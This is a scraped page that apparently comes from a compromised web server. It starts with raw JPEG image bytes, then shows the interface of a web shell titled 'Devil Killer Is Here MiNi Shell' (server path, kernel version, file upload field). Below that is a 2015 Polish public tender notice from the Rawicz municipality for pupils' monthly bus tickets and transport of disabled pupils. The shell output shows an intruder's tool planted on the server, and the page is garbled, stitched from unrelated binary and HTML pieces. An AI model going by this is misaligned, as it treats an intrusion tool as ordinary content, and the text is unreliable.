JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150618/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150618/89525-N-2015.html

<p class="kh_header"><b>Rawicz: Zakup biletów miesięcznych dla uczniów oraz dowóz uczniów niepełnosprawnych z terenu  gminy Rawicz do placówek oświatowych na rok szkolny 2015 / 2016</b><br>
<b>Numer ogłoszenia: 89525 - 2015; data zamieszczenia: 18.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup biletów miesięcznych dla uczniów oraz dowóz uczniów niepełnosprawnych z terenu  gminy Rawicz do placówek oświatowych na rok szkolny 2015 / 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest zakup biletów miesięcznych  dla uczniów dojeżdżających z terenu gminy Rawicz do placówek oświatowych  prowadzonych przez gminę Rawicz, w celu korzystania z usługi przewozów regularnych  osób 
w krajowym transporcie drogowym w ramach  linii regularnych  obejmujących miejscowości, z których  dojeżdżają uczniowie do gimnazjów w Rawiczu i Sierakowie, szkół podstawowych w Rawiczu i Zielonej Wsi oraz Zespołu Szkół Specjalnych w Rawiczu (pakiet I i II) oraz dowóz uczniów niepełnosprawnych  z terenu gminy Rawicz do Zespołu  Szkół Specjalnych w Rawiczu przy ul. Grota Roweckiego 9f oraz do Przedszkola nr 5 Oddziały Specjalne przy ul. Sarnowskiej 9A w Rawiczu wraz z zapewnieniem im opieki podczas dowozu, w celu korzystania z usługi przewozów regularnych specjalnych osób w krajowym transporcie drogowym (pakiet III). 
Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 7 i 8 do SIWZ. 

2.	Zamówienie będzie realizowane w roku szkolnym 2015/2016  z wykluczeniem dni wolnych od zajęć szkolnych, we wszystkie dni nauki szkolnej tzn. usługa świadczona będzie w dni powszednie z wyjątkiem świąt i innych dni ustawowo wolnych od pracy a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego  Dz. U. z 2002 r., nr 46, poz. 432 ze zm.; ( ferie zimowe i letnie, wiosenna i zimowa przerwa świąteczna). 

3.	Ilość dni nauki w roku szkolnym 2015/2016  wynosi 188 dni  i trwa  od 01.09. 2015 roku do 24.06. 2016 roku, za wyjątkiem nauki  dzieci z Oddziału  Specjalnego Przedszkola nr 5 w Rawiczu przy ul. Sarnowskiej 9a,  gdzie zajęcia  odbywać się będą od 01.09. 2015 roku do 31 lipca 2016 roku  - tj. przez 213 dni.   


4.	Zamawiający dokonał podziału zamówienia na trzy pakiety (części): 
Pakiet  I i  II  - dotyczy zakupu biletów miesięcznych dla uczniów dojeżdżających z terenu gminy Rawicz do placówek oświatowych  prowadzonych  przez gminę Rawicz, w celu korzystania z usługi przewozów regularnych osób 
w krajowym transporcie drogowym w ramach linii regularnych;  
Pakiet III -  dotyczy dowóz uczniów niepełnosprawnych z terenu gminy Rawicz do Zespołu Szkół Specjalnych 
w Rawiczu przy ul. Grota Roweckiego 9f oraz dowóz do Przedszkola Nr 5 Oddziały Specjalne przy ul. Sarnowskiej 9A w Rawiczu wraz z zapewnieniem im opieki podczas dowozu, w ramach korzystania z usługi przewozów regularnych specjalnych osób w krajowym transporcie drogowym.      

5.	Na dzień sporządzenia SIWZ w roku szkolnym 2015/2016 do korzystania z usług uprawnionych będzie: 
pakiet I -  342 uczniów ,  pakiet II -  431 uczniów , pakiet III -  9  uczniów niepełnosprawnych.    
Ogółem liczba dowożonych uczniów będzie wynosić  782  osób. 
Liczbę uczniów podano  wg stanu na m-c maj 2015 r. na podstawie złożonych informacji przez dyrektorów szkół. 
Wykaz szkół, miejscowości objętych dowozem oraz ilość dowożonych uczniów z poszczególnych miejscowości 
z podziałem na pakiety  podano w  załączniku nr  7. 
Ilości podane wyżej mogą ulec zmianie w zależności od decyzji rodziców dot. wyboru szkoły, w której dziecko będzie spełniać obowiązek szkolny lub nauki, jak również  z innych przyczyn mogących  wystąpić. 
Zamówienie mniejszej ilości usług nie jest traktowane jako odstąpienie od umowy przez Zamawiającego i nie daje po stronie Wykonawcy żadnych roszczeń, w szczególności o odszkodowanie. Ceny jednostkowe usług obowiązują przez cały okres realizacji zamówienia. 

6.	Dodatkowe informacje w zakresie zamówienia obejmują : 
1)	usługi mają być świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej i uczniów  niepełnosprawnych spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.  Wykonawca zamówienia musi dysponować autobusami z odpowiednią ilością miejsc w pojazdach i odpowiednią liczbą autobusów, zapewniających  dowóz wszystkich uczniów na poszczególnych trasach w wyznaczonych godzinach.   

2)	W przypadku awarii pojazdu Wykonawca jest zobowiązany do zapewnienia zastępczego środka transportu, 
w taki sposób aby nie powodował opóźnień czasowych kursu. Wobec powyższego jest zobowiązany posiadać autobus rezerwowy. 

3)	Wykonawca usługi zobowiązany jest do zawarcia umowy ubezpieczeniowej od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków w związku z wykonywaniem przedmiotu umowy ( na okres obowiązywania realizacji zamówienia). 

4)	Wszystkie dzieci  muszą być przywiezione do szkół najpóźniej na 5 min przed rozpoczęciem zajęć lekcyjnych  
i nie wcześniej niż 15 minut przed rozpoczęciem zajęć lekcyjnych.  (patrz -  uwaga w wykazie )
Godziny dowozu muszą umożliwiać dowożonym uczniom punktualne rozpoczęcie zajęć lekcyjnych. 

5)	Usługi  będą świadczone do niżej podanych placówek oświatowych na  terenie Gminy Rawicz zgodnie 
z ustalonym  i zatwierdzonym wykazem tras i godzinami rozpoczęcia i zakończenia zajęć stanowiącym załącznik nr 8. 
Zamawiający zastrzega sobie możliwość  dokonania zmian wykazie w zakresie: tras, nazw miejscowości 
i przystanków, godzin oraz ilości uczniów. W przypadku potrzeby wprowadzenia takim zmian Zamawiający 
w porozumieniu  z Dyrektorem Szkoły poinformuje Wykonawcę o potrzebie wprowadzenia zmian.  

WYKAZ SZKÓŁ:  

PAKIET I : 
Szkoła Podstawowa nr 4 w Rawiczu ul. Broniewskiego 5, 
Gimnazjum nr 1 w Rawiczu ul. Szarych Szeregów nr  3,
Szkoła Podstawowa Zielona Wieś nr 72,  
Zespół Szkół Specjalnych w Rawiczu ul. Grota Roweckiego nr  9F. 

         		PAKIET II :
         Szkoła Podstawowa nr 5 w Rawiczu , ul. Szkolna nr 3, 
         		Gimnazjum w Sierakowie, ul. Przyjemskiego 35, 63-900 Rawicz,
         Zespół Szkół Specjalnych w Rawiczu ul. Grota Roweckiego nr 9F
	Gimnazjum nr 1 w Rawiczu ul. Szarych Szeregów nr 3.  

	
	PAKIET III 
	Zespół Szkół Specjalnych w Rawiczu ul. Grota Roweckiego nr 9F,
	Przedszkole nr 5 Oddziały Specjalne  ul. Sarnowska 9A  w Rawiczu.
 
6)	W ramach pakietu II będą dowożone dzieci klas sportowych Gimnazjum nr 1 w Rawiczu do Gimnazjum 
w Sierakowie a następnie do siedziby Gimnazjum nr 1 w Rawiczu.
   
7)	Wykonawca przy realizacji usług zobowiązany będzie do: zapewnienia maksimum bezpieczeństwa przewożonych uczniów zgodnie z obowiązującymi przepisami technicznymi i normami dotyczącymi transportu zbiorowego osób, stosowania taboru do przewozu dzieci i młodzieży szkolnej oraz uczniów niepełnosprawnych, oraz jego prawidłowe oznakowanie zgodnie z obowiązującymi  w tym zakresie przepisami, ubezpieczenie 
w zakresie OC, NNW przez cały okres wykonywania zamówienia oraz ponoszenie kosztów szkód wynikłych 
w czasie wykonywania usług  jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny.

8)	Wykonawca  zobowiązuje się realizować  przedmiot umowy  zgodnie z obowiązującymi  przepisami prawa, 
w szczególności  w zgodnie z ustawą z dnia 7 września 2001 r.  o transporcie drogowym (Dz. U z 2013 roku  poz.  1414 ze zmianami) oraz  ustawą z dnia 20 czerwca 1997 r.  Prawo o ruchu drogowym  (Dz. U. z 2012 roku poz. 1137 ze zmianami) oraz wymaganymi prawem w tym zakresie licencjami i zezwoleniami. Wobec tego Zamawiający zastrzega sobie prawo do sprawdzenia wszelkich wymaganych prawem dokumentów związanych z prawidłowym  i pełnym wykonywaniem umowy jak również kontrolowania staranności  w wykonywaniu  przedmiotu umowy.  

7.	Zakres zamówienia obejmuje w szczególności:  

w zakresie PAKIETU  I i II  w ramach zakupu biletu miesięcznego    

1)	Przewóz uczniów (dowóz do szkół i odwóz  do miejsca zamieszkania)  na utworzonych przez Wykonawcę  liniach, z pierwszeństwem przejazdu uczniów z biletem miesięcznym. 
Wykonawca musi posiadać zezwolenia na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym na trasach, które przewidują zatrzymywanie się autobusów w poszczególnych miejscowościach na przystankach podanych przez Zamawiającego w załączniku nr 7 i 8 do SIWZ w określonym czasie,  przedziale czasowym określonym przez Zamawiającego. 
Jeżeli w dniu składania oferty Wykonawca nie posiada w/w zezwoleń lub posiadane zezwolenia muszą zostać dostosowane do wymagań Zamawiającego (zmiany wcześniej zatwierdzonych rozkładów jazdy), Wykonawca 
z którym zostanie zawarta umowa w sprawie zamówienia, zobowiązany będzie do uzyskania/zmiany takich zezwoleń przed rozpoczęciem roku szkolnego 2015/2016  tj. przed 01 września 2015 roku. 
Wobec tego Wykonawca w treści oferty złoży stosowne oświadczenie w tej sprawie.  

2)	Opieka nad dziećmi w czasie przewozu w środkach  transportu będzie zapewniona przez ZAMAWIAJCEGO.  
Na każdej trasie, w każdym autobusie opiekę nad uczniami sprawować będzie opiekun zatrudniony w danej jednostce oświatowej w ramach umowy lub zatrudniony przez Zamawiającego. Dane osobowe opiekunów zostaną zgłoszone Wykonawcy.

3)	Imienna lista uczniów, dla których mają być zakupione bilety na dany  okres rozliczeniowy (z podziałem na poszczególne placówki oświatowe) będzie przekazywana wybranemu Wykonawcy przez Zamawiającego - przed rozpoczęciem każdego miesiąca. 

4)	Ilość ( zamówionych )  kupowanych biletów miesięcznych w okresie obowiązywania umowy może ulegać zmianie. Powyższe nie powoduje zmianą ceny biletu. 
        
5)	Wykonawca jest zobowiązany dostarczyć bilety miesięczne do dyrektora danej szkoły  do ostatniego dnia roboczego każdego miesiąca. 
6)	Rozliczenia będą dokonywane w cyklu miesięcznym na podstawie zestawienia zamówionych biletów 
         miesięcznych. 
	Rozliczenie usługi ( dowóz i odwóz dzieci na podstawie zakupionego biletu) dokonywane będzie po wykonaniu  	całości zamówienia w cyklu miesięcznym w oparciu o zestawienie biletów.

7)	Podstawą miesięcznego rozliczenia należności za wykonane usługi stanowić będzie cena jednego biletu miesięcznego podana w ofercie oraz ilość uczniów dla których zostaną zamówione - zakupione bilety, 
z podziałem na poszczególne placówki oświatowe. 


w zakresie PAKIETU III  dowóz uczniów niepełnosprawnych:   
 		
8)	W ramach pakietu III  Wykonawca będzie zobowiązany do dowozu do Zespołu Szkół Specjalnych 
w Rawiczu uczniów posiadających orzeczenie o niepełnosprawności oraz  do Przedszkola nr 5 Oddziały Specjalne przy ul. Sarnowskiej 9A  w Rawiczu. Wobec powyższego  Zamawiający wymaga, aby Wykonawca zapewnił odpowiedni pojazd umożliwiający transport  dzieci niepełnosprawnych oraz zapewnił odpowiednią opiekę oraz  niezbędną pomoc przy wsiadaniu i wysiadaniu z pojazdu. Pojazd którym będą dowożone dzieci powinien być przystosowany konstrukcyjnie do przewozu osób niepełnosprawnych. Ponadto pojazd musi być wyposażony w foteliki dziecięce. Każde dziecko musi mieć zapewnione miejsce siedzące. 
Na dzień sporządzania SIWZ do korzystania z dowozów uprawnionych jest 9 uczniów niepełnosprawnych. Godziny rozpoczynania i kończenia zajęć zostaną ostatecznie ustalone pomiędzy Przewoźnikiem 
a Zamawiającym. Podczas transportu uczniów z domów do szkół i ze szkół do domów pełną odpowiedzialność za dzieci oraz prawidłową realizację ponosi Wykonawca. Dzieci będą odbierane spod domu o ustalonej wcześniej godzinie i po dowiezieniu na zajęcia będą przekazane pod opiekę nauczyciela lub innej 
osoby upoważnionej do odbioru. Pracownicy Wykonawcy sprawujący opiekę muszą zachować szczególną dbałość o dobro dzieci w czasie jazdy oraz pomagać dzieciom przy wsiadaniu do pojazdu i wysiadaniu. 
Stan techniczny pojazdu Wykonawcy winien być zgodny z obowiązującymi w tym zakresie przepisami. 
	Wykonawca musi posiadać zezwolenie na wykonanie przewozu regularnego specjalnego osób 
w krajowym transporcie drogowym. Jeżeli w dniu składania oferty Wykonawca nie posiada w/w zezwolenia, Wykonawca z którym zostanie zawarta umowa w sprawie zamówienia, zobowiązany będzie do 
uzyskania takiego zezwolenia przed rozpoczęciem roku szkolnego 2015/2016 tj. przed 1 września 2015 r. Wobec tego Wykonawca w treści oferty złoży stosowne oświadczenie w tej sprawie.  

9)	Opieka nad dziećmi w czasie przewozu w środkach  transportu będzie zapewniona przez WYKONAWCĘ, który w ramach niniejszego zamówienia i zaoferowanej ceny  jest zobowiązany do zapewnienia stałej 
i wykwalifikowanej opieki nad dziećmi. Pracownicy Wykonawcy sprawujący opiekę muszą zachować szczególną dbałość o dobro dzieci w czasie jazdy oraz pomagać dzieciom przy wsiadaniu do pojazdu i wysiadaniu oraz ponoszą pełną odpowiedzialność za ich bezpieczeństwo.    
10)	Imienna lista uczniów wraz z adresem przewidzianych do dowozu i  wskazaniem placówki oświatowej będzie przekazana wybranemu Wykonawcy przez Zamawiającego  - przed rozpoczęciem każdego miesiąca. 
11)	Ilość uczniów niepełnosprawnych przewidzianych do dowozu w okresie obowiązywania umowy może uleć zmianie. Powyższe zmiany nie będą jednak wpływać na zmianę stawki za kilometr. 
12)	Rozliczenie usługi  będzie dokonywane w cyklu miesięcznym. Podstawą do rozliczenia należności za wykonane usługi stanowić będzie cena jednego kilometra podana w ofercie  przez Wykonawcę oraz ilość kilometrów podana w harmonogramie, chyba że zostanie zrealizowana mniejsza ilość kilometrów. 
13)	Zamawiający zastrzega możliwość odstępstw od ustalonego harmonogramu przewozu w szczególności 
z powodu zmiany: planu lekcji,  ilości dzieci ( w tym przerwy w nauce spowodowane chorobą),  zmiany organizacji zajęć polegających  na odpracowaniu  zajęć itd.  O takich przypadkach Wykonawca zostanie powiadomiony przez wskazanego przez Zamawiającego przedstawiciela na dzień przed terminem zmian.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt  6 ustawy, stanowiących nie więcej niż 30 % wartości zamówienia podstawowego (dla każdej części - pakietu) polegającego na powtórzeniu tego samego rodzaju zamówień, w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy WYKONAWCA  przystępujący do przetargu jest obowiązany wnieść wadium wysokości ustalonej dla danego pakietu na który składa ofertę i tak:
a)  PAKIET I 	-  2.100,00 PLN    
b)  PAKIET II	-  2.400,00 PLN   
c)  PAKIET III	-  1.200,00 PLN 

2.	Wadium  musi obejmować cały okres związania ofertą i może być wniesione:  w pieniądzu ,  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach  bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.	W przypadku wyboru wpłaty wadium  w pieniądzu należy je wnieść przelewem na rachunek bankowy Zamawiającego GETIN NOBLE BANK SA 82 1560 0013 2885 7118 4000 0005.  
	Przy wnoszeniu wadium Wykonawca winien na blankiecie przelewu powołać się na nazwę zadania podaną przez Zamawiającego. Zaleca się, aby kopia dowodu przelewu została potwierdzona za zgodność z oryginałem i dołączona do oferty. 
	Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium.  O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono  w wymaganym terminie, decyduje data i godzina wpływu środków na wskazany wyżej  rachunek Zamawiającego. 

4.	Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna, odpowiednie dokumenty w formie oryginału należy złożyć (w terminie o którym mowa w punkcie 5)  poprzez dołączenie do oferty w taki  sposób aby mogły one stanowić osobny dokument tzn. nie były trwale związane z ofertą i istniała możliwość bez naruszenia oferty odesłać ten dokument po jego wykorzystaniu. 
	Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium we wszystkich okolicznościach określonych w ustawie Prawo zamówień publicznych  -  art. 46 ust. 4a i  5 ustawy PZP.
5. Pozostałe zapisy dotyczące wadium wynikają z rozdziału XII SIWZ oraz ustawy PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać uprawnienia do wykonywania określonej działalności. Zamawiający uzna za spełnienie tego warunku na podstawie załączonej do oferty aktualnej licencji na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 06.09. 2001 roku o transporcie drogowym (t.j. Dz. U. z 2013 r. poz. 1414 z póź. zm.) oraz Oświadczenia Wykonawcy potwierdzającego spełnienie tego warunku (załącznik nr 2 do SIWZ).
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie świadczył lub świadczy należycie co najmniej  jedno zamówienie związane z przewozem osób o wartości brutto: dla pakietu I - 50.000 zł,  dla pakietu II - 60.000 zł,   dla pakietu III -  20.000 zł.  
Gdy Wykonawca składa ofertę na  wybrany pakiet to musi wykazać spełnienie warunku ustalonego dla tego pakietu, natomiast gdy składa oferty na  dwa lub trzy pakiety wystarczy wykazać spełnienie warunku ustalonego dla pakietu o większej wartości,  z tych na które składa oferty. W takim przypadku  Zamawiający uzna za spełnienie  tego warunku dla obu lub wszystkich pakietów,  na które została złożona oferta. Zamawiający w przypadku, gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane (w trakcie realizacji).  W takim przypadku  część zamówienia już faktycznie wykonana musi wypełniać wymogi określone przez Zamawiającego w  niniejszym punkcie.  Warunek wiedzy i doświadczenia Wykonawcy oceniony zostanie na podstawie załączonego do oferty Oświadczenia Wykonawcy  potwierdzającego spełnienie tego warunku (załącznik nr 2 do SIWZ)  wraz z załączeniem do oferty wykazu wykonanych lub wykonywanych głównych usług  w podanym wyżej okresie (załącznik nr 4 do SIWZ). 

W celu potwierdzenia spełnienia tego warunku, w wykazie usług głównych należy wskazać co najmniej jedną usługę 
związaną z przewozem osób o wartości i na zasadach podanych wyżej.  Ponadto do wykazu należy załączyć dowody, z których będzie wynikało, że usługi zostały wykonane należycie lub są wykonywane należycie.  
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

